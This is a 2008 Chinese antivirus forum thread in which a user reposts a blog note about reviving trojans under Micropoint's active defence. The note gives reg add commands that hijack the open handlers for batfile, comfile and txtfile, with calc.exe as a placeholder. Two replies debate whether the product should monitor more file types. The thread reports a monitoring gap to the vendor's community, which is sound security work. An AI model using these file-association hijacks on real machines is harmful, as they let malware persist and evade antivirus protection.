» 游客:  注册 | 登录 | 帮助  微点交流论坛 » 主动防御 » 【shineast】在微点的监控下复活病毒木马，小发现而已   作者: 标题: 【shineast】在微点的监控下复活病毒木马，小发现而已 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #1  【shineast】在微点的监控下复活病毒木马，小发现而已 shineast’s Blog http://hi.baidu.com/shineastdh/b ... 3005dc8c10297d.html 资　料: 看雪软件安全论坛 shineast 男, 24岁 帖子: 26 精华: 2 声望: 11    就读过的学校： 西安交大 个人简介： 将漏洞挖掘进行到底! 我的理想就是做中国最好的杀毒软件，现在正在学习微点，虽然微点在技术上还有很多问题，但是思想上已经是创新了。 另外微点实现这个思想的时候方法、细节还是有点问题，绕过就是很头疼的问题。 没办法，搞事业就要不断的遇到问题，能做好技术，解决好问题才是王道！ 2008年05月25日 星期日 下午 04:34 reg add HKEY_CLASSES_ROOT\batfile\shell\open\command /v "" /t REG_SZ /d "C:\WINDOWS\system32\calc.exe" /f reg add HKEY_CLASSES_ROOT\comfile\shell\open\command /v "" /t REG_SZ /d "C:\WINDOWS\system32\calc.exe" /f reg add HKEY_CLASSES_ROOT\txtfile\shell\open\command /v "" /t REG_SZ /d "C:\WINDOWS\system32\calc.exe" /f ....... 多整几个xxxfile，这样复活、唤醒的概率就比较高 经过我的测试，貌似微点的RD就监控了一个 exefile，这是为什么呢？ 为啥不监控其他xxxfile呢，看来微点很自信！ 不过我觉得不安全，应该监控所有的xxxfile，反正监控1个和监控10没啥区别 【shineast】终于领悟了主动防御 http://bbs.micropoint.com.cn/showthread.asp?tid=33493&fpage=2 【shineast】僵尸还魂——自启动+kill微点(已解决) http://hi.baidu.com/micropoint/b ... 833046fbf2c093.html 【shineast】东方微点注册表保护绕过及反绕过实现(已解决) http://bbs.micropoint.com.cn/showthread.asp?tid=33345&fpage=1 [ Last edited by 点饭的百度空间 on 2008-5-25 at 17:06 ] ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 你的微笑 is 微点的骄傲！ http://hi.baidu.com/new/micropoint 2008-5-25 16:52 ma2235153 注册用户 积分 150 发帖 150 注册 2008-3-13 #2   监视一个应该有他的道理吧！10会不会占资源啊 ※ ※ ※ 本文纯属【ma2235153】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-5-25 19:47 gudan 高级用户 积分 605 发帖 579 注册 2007-7-20 #3   感觉这个意义不大，木马主要以网络为主的，行为构成以后再回滚也不迟，倘若把这里看的死死的，装个UE能烦死人 ※ ※ ※ 本文纯属【gudan】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-5-25 19:55 论坛跳转: 微点软件公测区 安全快报  > 病毒快报  > 漏洞快报 微点产品在线技术支持  > 微点主动防御软件  > 预升级反馈专区  > 微点杀毒软件 微点用户交流区  > 微点新闻  > 微点软件使用交流  > 微点茶室 安全技术交流区  > 主动防御  > 反病毒  > 防火墙 综合区  > 电脑&数码  > 体育&娱乐&休闲  > 灌水区 版务管理 内部使用专区  可打印版本 | 推荐 | 订阅 | 收藏 [ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司 闽ICP备05030815号